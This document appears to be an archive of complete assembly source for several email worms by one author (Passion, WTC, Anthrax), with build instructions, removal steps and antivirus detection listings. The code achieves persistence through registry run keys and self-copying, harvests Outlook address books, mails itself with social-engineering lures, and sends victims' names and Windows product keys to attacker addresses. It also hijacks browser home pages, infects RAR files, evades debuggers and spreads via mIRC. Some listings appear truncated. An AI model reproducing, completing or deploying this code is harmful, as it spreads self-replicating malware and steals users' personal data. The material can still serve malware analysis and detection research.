Comodo 1157 2009.05.08 Worm.Win32.Petik.Q
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eTrust-Vet 31.6.6508 2009.05.16 Win32/Himan
F-Prot 4.4.4.56 2009.05.16 W32/Malware!92e7
GData 19 2009.05.16 Generic.Malware.SMsp!g.42345E6D
McAfee+Artemis 5616 2009.05.15 Artemis!7B523F10E098
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.H1
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.H@mm
NOD32 4080 2009.05.15 Win32/Petik.Q
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.5632.B
Panda 10.0.0.14 2009.05.16 W32/Petik
PCTools 4.4.2.0 2009.05.16 I-Worm.Rush.A
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.m
Sophos 4.41.0 2009.05.16 W32/Petik-H
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.Q
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Petik
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Rush.A
MD5...: 7b523f10e09815dd401a4db17a9813c5
SHA1..: b7f647c90aeb06ee2ce145c152d09bf67966559f
comment #
Name : I-Worm.Passion
Author : PetiK
Date : September 3rd - September 8th

* WINDOWS\SYSTEM\MsVbdll32.exe
* MsVbdll = WINDOWS\SYSTEM\MsVbdll32.exe
In dependency on system counter it redirect URL to :

http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm
If the key HKCU\Software\[Check Passion] doesn't exist it send a mail to

passion@multimania.com some information about victim.
It creates %windir%\AllMail.txt with all mails that it founds in the Outlook

Address Book and send a new mail :
Subject : Take a look at this...

Body : It's very important. Mail me if you have some problems.
Attachment : Important.exe
It sends a mail to passionworm@multimania.com (passionpetik) too with some

informations.
To build the worm:

@echo off
tasm32 /ml /m9 Passion
tlink32 -Tpe -c -x -aa Passion,,,import32,dllz
upx -9 Passion.exe
To delete the worm:

del %windir%\system\MsVbdll32.exe <= copy of the worm
del %windir%\AllMail.txt <= mails are saved here
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
start: call hide_worm
twin_worm:
push 50
push esi
push 0

push edi
push 50
push edi
add edi,eax
mov eax,"VsM\"
stosd
mov eax,"lldb"
stosd
mov eax,"e.23"
stosd
mov eax,"ex"
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
reg_save:
push 8
push edi
push 1
@pushsz "MsVbdll"
push 80000002h
callx SHSetValueA
check_connect:
push 0
push offset connected
callx InternetGetConnectedState
dec eax
jnz exec_other
system_counter:
callx GetTickCount
xor edx,edx
mov ecx,10
div ecx
cmp edx,2
jne check_connect
call change_page
chec_reg:
push offset regDisp
push offset regResu
push 0
push 0F003Fh
push 0
push 0
push 0
@pushsz "Software\[Check Passion]"
push 80000001h
callx RegCreateKeyExA
push [regResu]
callx RegCloseKey
cmp [regDisp],1
jne vbs_file
search_info:
push 50
push offset passion_txt
@pushsz "\Passion.txt"
callx lstrcat
call CreateDate
call CreateTime
push offset date
@pushsz "Date"
@pushsz "Date et Heure"
push offset time
@pushsz "Heure"
@pushsz "Date et Heure"
mov esi,offset name_user

call name_size
dd 30
name_size:
push esi
call reg
dd 1
reg:
push 80000002h
callx SHGetValueA
push offset name_user
@pushsz "Nom d'enregistrement"
@pushsz "Information systême"
mov esi,offset name_company

call company_size
dd 30
company_size:
push esi
call reg2
dd 1
reg2:
@pushsz "RegisteredOrganization"
push 80000002h
callx SHGetValueA
push offset name_company
@pushsz "Nom de l'entreprise"
mov esi,offset number_key

call key_size
dd 30
key_size:
push esi
call reg3
dd 1
reg3:
@pushsz "ProductKey"
push 80000002h
callx SHGetValueA
push offset number_key
@pushsz "Numéro de la clé Windows"
push 50
push offset Systemini
@pushsz "\Win.ini"
callx lstrcat
push 20
push offset default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA
@pushsz "Pays"
xor eax,eax
push eax
push eax
push offset Message2
push eax
push [hMapi]
callx MAPISendMail
vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\passion.vbs"
callx CreateFileA
xchg edi,eax
push 0
push offset octets
push vbssize
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\passion.vbs"
callx WinExec
push 1000
callx Sleep
@pushsz "C:\passion.vbs"
callx DeleteFileA
start_scan:
mov edi,offset allmail
push edi
push 50
push edi
add edi,eax
mov eax,"llA\"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
open_scan_mail:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset allmail
callx CreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
callx GetFileSize
cmp eax,3
jbe end_s3
scan_mail:
xor edx,edx
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
end_s3: push esi

end_s2: push ebp
callx CloseHandle
end_s1: push ebx
callx CloseHandle
end_spread:
popad
jmp end_w
exec_other:
push 10000
callx Sleep
push 0
push offset copy_worm
callx WinExec
end_w: push 00h
callx ExitProcess
hide_worm:
pushad
xchg eax,ecx
jecxz end_hide_worm
push ecx
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
change_page:
pushad
call @value
db "Default_Page_URL",0
db "Search Page",0
db "Start Page",0
db "Local Page",0
@value: pop esi
push 4
pop ecx
p_loop:
push ecx
push 32
@pushsz "http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm"
push 1
push esi
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop p_loop
popad
ret
CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "ddd, dd MMM yyyy"
push 0
push 0
push 9
callx GetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
callx GetTimeFormatA
popad
ret
CreateTime EndP
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [hMapi]
callx MAPISendMail
ret
.data
; === copy_worm ===
date db 17 dup (?)
time db 9 dup (?)
; === search_info ===

name_user dd 0
name_company dd 0
number_key dd 0
default db 0
Systemini db 50 dup (0)
org_pays db 20 dup(0)
passion_txt db 50 dup (0)
regDisp dd 0
regResu dd 0
; === spread ===
connected dd 0
octets dd ?
allmail db 50 dup (0)
hMapi dd 0
subject db "Take a look at this...",0

body db "It's very important. Mail me if you have some problems.",0
name_mail db "Important.exe",0
subject2 db "Worm.Passion",0
body2 db "Another person",0
mail_me db "passionworm@multimania.com",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
Message2 dd ?
dd offset subject2
dd offset body2
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo2
dd 1
dd offset Attach2
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
MsgTo2 dd ?
dd 1
dd ?
dd offset mail_me
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
Attach2 dd ?
dd ?
dd ?
dd offset passion_txt
dd ?
dd ?
vbsd: db 'On Error Resume Next',0dh,0ah
db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt")',0dh,0ah
db 'For Each M In chan.AddressLists',0dh,0ah
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
db 'Set P=M.AddressEntries(O)',0dh,0ah
db 'Set
txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah
db 'txt.WriteLine P.Address',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set
txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah
db 'txt.WriteLine "#"',0dh,0ah
vbssize equ $-vbsd
signature db "I-Worm.Passion",00h
author db "Coded by PetiK - 2001",00h
end start
end
File Passion.exe received on 05.16.2009 19:28:44 (CET)

Authentium 5.1.2.4 2009.05.16 W32/Malware!cacd
Avast 4.8.1335.0 2009.05.15 Win95:Passion
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.SMksp!g.37F2CD76
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.V
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.16 W32/Malware!cacd
GData 19 2009.05.16 Generic.Malware.SMksp!g.37F2CD76
McAfee+Artemis 5616 2009.05.15 Artemis!0A4E37025FEC
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.O@mm
NOD32 4080 2009.05.15 Win32/Petik.V
Norman 6.01.05 2009.05.16 W32/Petik.R
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.C
PCTools 4.4.2.0 2009.05.16 I-Worm.Passion.A
Rising 21.29.52.00 2009.05.16 Worm.Mail.Win32.Petik
Sophos 4.41.0 2009.05.16 W32/Petik-M
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.O
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Passion.A
MD5...: 0a4e37025fec58713036fa88a28a070e
SHA1..: d85aa3be13c031e015b7378c7cb1951fb7ba2efa
comment #
Name : I-Worm.WTC (aka:I-Worm.Super -> It was the first worm's name.)
Author : PetiK
Date : September 11th (A great day that we don't forget all around the world) - October
11th
Size : 8704 byte (compiled with upx tool)
Action: Copy itself to

* WINDOWS\SYSTEM\Visual8.exe
* Visual Debugger = WINDOWS\SYSTEM\Visual8.exe
It infects all RAR files in the Personal directory.
It creates C:\wrm.vbs. This file search and stocks all email in the WAB to the file
C:\email.mel. Wait 2 sec. and deletes the vbs file.
When the current day is the 11th it displays a messagebox.
Note of the author.

-------------------
After the terrible terrorist attacks, I wanted to do something. I can't destroy the
computers to show my anger. It's a stupid reaction. I wanted to warn people to help to
find the authors of this attacks. And I wanted to help myself.
The target of this worm is not to spread to infect other computers but to help FBI,
etc... in their investigation.
To delete the worm :

@echo off
del %windir%\SYSTEM\Visual8.exe
attrib -H C:\email.mel
del C:\email.mel
To built the worm :

@echo off
tasm32 /ml /m9 WTC
tlink32 -Tpe -c -x -aa WTC,,,import32,dllz
upx -9 WTC.exe
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
start: call hide_worm

call mess_worm
twin_worm:
push 50
push esi
push 0
api GetModuleFileNameA

push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"siV\"
stosd
mov eax,"8lau"
stosd
mov eax,"exe."
stosd
pop edi
push 0
push edi
push esi
api CopyFileA
push 15
push edi
push 1
@pushsz "Visual Debugger"
push 80000002h
api SHSetValueA
special_folder:
pushad
push 0
push 5
push 0
api SHGetSpecialFolderPathA
api SetCurrentDirectoryA
call get_worm_crc
find_first_rar:
push offset Search
@pushsz "*.rar"
api FindFirstFileA
inc eax
je find_close_rar
dec eax
mov [hSearch],eax
i_r: call infect_rar
push offset Search
push [hSearch]
api FindNextFileA
test eax,eax
jne i_r
find_close_rar:
push [hSearch]
api FindClose
end_virtual:
push 8000h
push 0
push [worm_main]
api VirtualAlloc
end_all_rar:
popad
call vbs_file
push 2 or 20h
@pushsz "C:\email.mel"
api SetFileAttributesA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
open_scan_mail:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "C:\email.mel"
api CreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_s3
scan_mail:
xor edx,edx
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"%"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
end_s3: push esi

api UnmapViewOfFile
end_s2: push ebp
api CloseHandle
end_s1: push ebx
api CloseHandle
end_spread:
popad
start_page:
pushad
mov edi,offset sinet
call sinet_size
dd 160
sinet_size:
push edi
call reg
dd 1
reg:
push 80000001h
api SHGetValueA
call @web
db "http://stcom.net/",0
db "http://stcom.net/default2.htm",0
db "http://stcom.net/qoqazfr",0
db "http://stcom.net/kavkoz",0
db "http://stcom.net/falestine",0
db "http://stcom.net/oulamah",0
db "http://stcom.net/Oulamah",0
db "http://stcom.net/An-Nissa",0
db "http://stcom.net/ahghanistan",0
db "http://www.alesteqlal.com/",0
@web:
pop esi
push 10
pop ecx
w_loop:
push ecx
push esi
push offset sinet
api lstrcmp
test eax,eax
jnz continue
call alert_fbi
jmp end_web
continue:
@endsz
pop ecx
loop w_loop
end_web:
popad
end_worm:
push 0
api ExitProcess
hide_worm:
pushad
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
mess_worm:
pushad
api GetSystemTime
jne end_mess
push 40h
@pushsz "I-Worm.Super coded by PetiK"
call @txt
db "Because of the different terrorism acts in the USA",0dh,0ah
db "I don't will destroy your computer.",0dh,0ah,0dh,0ah
db "If you have some informations about the authors or Ben Laden,",0dh,0ah
db 9,"PLEASE CONTACT THE FBI",0
@txt:
push 0
api MessageBoxA
end_mess:
popad
ret
get_worm_crc Proc
pushad
push 0
push 80h
push 3
push 0
push 0
push 80000000h
api CreateFileA
inc eax
je end_all_rar
dec eax
mov [hFile],eax
push 0
push eax
api GetFileSize
mov [filesize],eax
mov [RARCompressed],eax
mov [RAROriginal],eax
push eax
push 4
push 1000h or 2000h
push eax
push 0
api VirtualAlloc
test eax,eax
pop edx
je end_file
xchg eax,ebx
mov [worm_main],ebx
push edx
push 0
push offset tmp
push edx
push ebx
push [hFile]
api ReadFile
pop edi
mov esi,ebx
call CRC32
mov [RARCRC32],eax
end_file:
push [hFile]
api CloseHandle
popad
ret
get_worm_crc EndP
CRC32 Proc
push ecx
push edx
push ebx
xor ecx,ecx
dec ecx
mov edx,ecx
nxt_byte_crc:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
nxt_bit_crc:
shr bx,1
rcr ax,1
jnc no_crc
xor ax,08320h
xor bx,0EDB8h
no_crc: dec dh
jnz nxt_bit_crc
xor ecx,eax
xor edx,ebx
dec edi
jne nxt_byte_crc
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
ret
CRC32 EndP
infect_rar Proc
pushad
api GetFileAttributesA
cmp eax,1
je end_inf
push 0
push 80h
push 3
push 0
push 0
push 80000000h or 40000000h
api CreateFileA
inc eax
je end_inf
dec eax
xchg eax,ebx
push 2
push 0
push 0
push ebx
api SetFilePointer
mov esi,offset RARHeaderCRC+2

push end_RAR-RARHeader-2
pop edi
call CRC32 ;calculate CRC32 of rar header
mov [RARHeaderCRC],ax
push 0
push offset tmp
push end_RAR-RARHeader
call end_RAR
RARHeader:
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw end_RAR-RARHeader
RARCompressed dd 2000h
RAROriginal dd 2000h
RAROS db 0
RARCRC32 dd 0
RARFileDateTime dd 12345678h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw end_RAR-RARName
RARAttrib dd 0
RARName db 'SUPER.EXE'
end_RAR:push ebx
api WriteFile ;write the rar header
push 0
push offset tmp
push [filesize]
push [worm_main]
push ebx
api WriteFile ;write the worm
push ebx
api CloseHandle ;close the file
push 1
api SetFileAttributesA ;set already-infected mark
end_inf:popad
ret
infect_rar EndP
vbs_file Proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\wrm.vbs"
api CreateFileA
xchg eax,ebx
push 0
call @tmp
dd ?
@tmp:
push e_vbs - s_vbs
call e_vbs
s_vbs: db 'On Error Resume Next',CRLF
db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set O=CreateObject("Outlook.Application")',CRLF
db 'Set M=O.GetNameSpace("MAPI")',CRLF
db 'Set mel=f.CreateTextFile("C:\email.mel")',CRLF
db 'mel.Close',CRLF
db 'For Each N In M.AddressLists',CRLF
db 'If N.AddressEntries.Count <> 0 Then',CRLF
db 'For c=1 To N.AddressEntries.Count',CRLF
db 'Set P=N.AddressEntries(c)',CRLF
db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF
db 'mel.WriteLine P.Address',CRLF
db 'mel.Close',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'Set mel=f.OpenTextFile("C:\email.mel",8,true)',CRLF
db 'mel.WriteLine "%"',CRLF
db 'mel.Close',CRLF
e_vbs: push ebx
api WriteFile
push ebx
api CloseHandle
push 1
@pushsz "wscript C:\wrm.vbs"
api WinExec
push 5000
api Sleep
@pushsz "C:\wrm.vbs"
api DeleteFileA
popad
ret
vbs_file EndP
send_mail:
xor eax,eax
push eax
push eax
push offset MsgWrm
push eax
push [hMAPI]
api MAPISendMail
ret
alert_fbi:
@pushsz "C:\information.txt"
push offset sinet
@pushsz "Start Page of MSIE"
@pushsz "Information about the suspect written by the Worm"
api WritePrivateProfileStringA
mov edi,offset names

call name_size
dd 160
name_size:
push edi
call reg2
dd 1
reg2:
push 80000002h
api SHGetValueA
push offset names
@pushsz "Name of the suspect"
push 50
api GetWindowsDirectoryA
@pushsz "\Win.ini"
api lstrcat
push 20
push offset default
@pushsz "sCountry"
@pushsz "intl"
api GetPrivateProfileStringA
@pushsz "Country of the suspect"
xor eax,eax
push eax
push eax
push offset MsgFbi
push eax
push [hMAPI]
api MAPISendMail
push 30000
api Sleep
api DeleteFileA
ret
.data
; === copy_worm ===
rar_worm db 50 dup (0)
; === rar_files ===

worm_main dd ?
tmp dd ?
filesize dd ?
hFile dd ?
hSearch dd ?
; === scan_mail ===

hMAPI dd 0
inet dd 0
; === information ===

sinet dd 0
names dd 0
Systemini db 50 dup (0)
org_pays db 20 dup(0)
default db 0
; === gen_mail ===

infofbi db "C:\information.txt",0
mailfbi db "newyork@fbi.gov",0
subjectfbi db "WARNING ABOUT DJIHAD AND PERHAPS BENLADEN !",0
bodyfbi db "This is a mail written by a worm called "
db "I-Worm.WTC coded by PetiK.",CRLF
db "The reason to receive this sort of mail is that the "
db "worm has found in the somebody's computer the link "
db "to http://stcom.net or other site web dealing with the djihad.",CRLF,CRLF
db "You can see some informations about this person with Start Page "
db "of MSIE, registered owner and the country.",CRLF,CRLF
db "I hope that it help you in your investigations about the "
db "terrorist attacks in NYC and Washington DC.",CRLF,CRLF
db 9,9,"Worm.WTC - PetiK",0
subjectwrm db "Everybody against the terrorists !",0

bodywrm db "This freeware will help us to fight the terrorist "
db "who kill innocent civilians.",CRLF,CRLF
db 9,"Click at the attached file to see.",00h
name_mail db "StopTerrorists.exe",00h
MsgFbi dd ?
dd offset subjectfbi
dd offset bodyfbi
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToFbi
dd 1
dd offset AttachFbi
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgToFbi dd ?
dd 1
dd ?
dd offset mailfbi
dd ?
dd ?
AttachFbi dd ?
dd ?
dd ?
dd offset infofbi
dd ?
dd ?
MsgWrm dd ?
dd offset subjectwrm
dd offset bodywrm
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToWrm
dd 1
dd offset AttachWrm
MsgToWrm dd ?
dd 1
dd ?
dd offset mail_addr
dd ?
dd ?
AttachWrm dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
signature db "I-Worm.WTC",00h
end start
end
SUPER.VBS
verif=ws.RegRead("HKLM\Software\Microsoft\SuperWorm\")
If verif <> "send" Then
ro1=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ro2=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
pk=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
pi=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
ver=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
vern=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
sp=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
ld=ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
Set OA=CreateObject("Outlook.Application")
Set EM=OA.CreateItem(0)
EM.To="petik@multimania.com"
EM.BCC = "support@microsoft.com; support@avx.com; nimda-request@sophos.com"
EM.Subject="I am infected by I-Worm.Super !!"
body="My name is " & ro1 & ","
body = body & VbCrLf & "I was infected by I-Worm.Super :-("
body = body & VbCrLf & "It was on "& date & " at " & time & "."
body = body & VbCrLf & "If you want some informations about me :"
body = body & VbCrLf & "My registered owner : " & ro1
body = body & VbCrLf & "My registered organization : " & ro2
body = body & VbCrLf & "My Product Key : " & pk
body = body & VbCrLf & "My Product Indentification : " & pi
body = body & VbCrLf & "My version of Windows : " & ver & " " & vern
body = body & VbCrLf & "My start page of MSIE : " & sp
body = body & VbCrLf & "My country : " & ld
body = body & VbCrLf & "Please help me !"
body = body & VbCrLf & "Thank you very much."
EM.Body=body
EM.DeleteAfterSubmit=True
EM.Send
ws.RegWrite "HKLM\Software\Microsoft\SuperWorm\","send"
End If
File WTC.exe received on 05.16.2009 20:03:13 (CET)

AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.8704.C
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Gen
Authentium 5.1.2.4 2009.05.16 W32/Malware!2e38
Avast 4.8.1335.0 2009.05.15 Win32:Petik-WTC
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.M
BitDefender 7.2 2009.05.16 Generic.Malware.SMsp!g.852A5C9B
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 Worm.WTC
Comodo 1157 2009.05.08 Worm.Win32.Petik.U
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.12288
eSafe 7.0.17.0 2009.05.14 Win32.Petik
F-Prot 4.4.4.56 2009.05.16 W32/Malware!2e38
GData 19 2009.05.16 Generic.Malware.SMsp!g.852A5C9B
McAfee+Artemis 5616 2009.05.15 Artemis!2FB45484ACDD
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Gen
Microsoft 1.4602 2009.05.16 Worm:Win32/PetTick.L@mm
NOD32 4080 2009.05.15 Win32/Petik.U
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.D
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik
PCTools 4.4.2.0 2009.05.16 I-Worm.Petik.J1
Rising 21.29.52.00 2009.05.16 Worm.Petik.GEN
Sophos 4.41.0 2009.05.16 W32/Petik-WTC
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.Q
VBA32 3.12.10.5 2009.05.16 Win32.Worm.WTC
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.C
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petik.J1
MD5...: 2fb45484acdd0ec3a4f7f199b13e2262
SHA1..: 657559e72ba0fb47cbe296be5f8c8d01c1164636
comment #
Name : I-Worm.Anthrax (aka : I-Worm.Fi)
Author : PetiK
Date : October 11th - November 6th

* WINDOWS\SYSTEM\MsSys32.exe
* Microsoft System = WINDOWS\SYSTEM\MsSys32.exe
The virus uses anti-* against SoftICE
It creates a file to go to a web site about the anthrax.

On the Desktop if it can or else on c:\ root.
It creates in some directory a script to be able to spread with mIRC :
-C:\mirc
-C:\mirc32
-C:\progra~1\mirc
-C:\progra~1\mirc32
To spread, it uses MAPI mechanism with 10 first email found in the WAB.

Look at the file Delete_Fi.vbs
To built the worm :

@echo off
tasm32 /ml /m9 Anthrax
tlink32 -Tpe -c -x -aa Anthrax,,,import32,dllz
upx -9 Anthrax.exe
Notes of the authors:

The worm bugs at the end of it spread WAB.
I want to thanks very much Benny. I learnt a lot of things while seeing his differents
code (XTC, HiV and Universe).
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
start:
twin_worm:
push 50
push esi
push 0
api GetModuleFileNameA ; esi = name of file

push edi
push 50
push edi
add edi,eax
mov eax,"SsM\"
stosd
mov eax,"23sy"
stosd
mov eax,"exe."
stosd
pop edi ; edi = %system%\MsSys32.exe
push 1
push edi
push esi
api CopyFileA ; copy itself
test eax,eax
je end_twin ; already copy ??
push 20
push edi
push 1
@pushsz "Microsoft System"
push 80000002h
api SHSetValueA ; regedit
mess: push 1040h

@pushsz "Microsoft Windows"
call @txt
db "You must be connected to run this file.",CRLF,CRLF
db "If it's not the case, please connect you.",0
@txt:
push 0
api MessageBoxA ; fake message
end_twin:
call debug
e_sr:
call hide_worm
call create_url
call spread_mirc
verif_inet:
push 0
push offset inet
dec eax
jnz verif_inet
spread_wab:
pushad
srch_wab:
mov edi,offset wab_path
push offset wab_size
push edi
push offset reg
push 0
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" ; The name of WAB file
push 80000001h
api SHGetValueA
push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset wab_path
api CreateFileA
inc eax
je end_srch_wab
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
test eax,eax
je end_wab1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_wab2
xchg eax,esi
mov verif,0
d_scan_mail:
call @smtp
db 'SMTP',00h,1Eh,10h,56h,3Ah ; the string what we want to find
@smtp:
pop edi
s_scan_mail:
pushad
push 9
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop s_scan_mail
end_wab3:
push esi
api UnmapViewOfFile
end_wab2:
push ebp
api CloseHandle
end_wab1:
push ebx
api CloseHandle
end_srch_wab:
popad
end_worm:
push 0
api ExitProcess
create_url: ; This routine has perhaps bug on WinNT/2k

pushad
desktop_url:
@pushsz "SHELL32.dll"
api LoadLibraryA
mov ebx,eax
push ebx
api GetProcAddress
test eax,eax
jz on_hd
mov ebp,eax
push 0
push 0 ; DESKTOP
push offset desktop
push 0
call ebp
@pushsz "\Anthrax_Info.url"
push offset desktop
api lstrcat
mov esi,offset desktop
jmp c_sys
on_hd:
@getsz "C:\Anthrax_Info.url",esi
c_sys:
push 50
push offset shelldir
@pushsz "\Shell32.dll"
api lstrcat
cr_url:
push esi
@pushsz "http://www.anthrax.com"
@pushsz "URL"
@pushsz "InternetShortcut"
push esi
@pushsz "23"
@pushsz "IconIndex"
push esi
@pushsz "IconFile"
end_url:
push ebx
api FreeLibrary
popad
ret
debug Proc
pushad
mov eax,fs:[20h]
test eax,eax
je $+4
kill: int 19h ; CD19
api IsDebuggerPresent
test eax,eax
jne kill
push 0
push 80h
push 3
push 0
push 0
push 40000000h or 80000000h
@pushsz "\\.\SICE" ; SOFTICE driver win98
api CreateFileA
inc eax
jne kill
push 0
push 80h
push 3
push 0
push 0
push 40000000h or 80000000h
@pushsz "\\.\NTICE" ; SOFTICE driver winNT/2k
api CreateFileA
inc eax
jne kill
popad
ret
debug EndP
hide_worm Proc
pushad
@pushsz "KERNEL32.dll"
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
spread_mirc Proc
push 50
push offset mircspread
@pushsz "\MsSys32.exe"
push offset mircspread
api lstrcat
pushad
call @mirc
db 'C:\mirc\script.ini',0
db 'C:\mirc32\script.ini',0 ; spread with mIRC. Thanx to Microsoft.
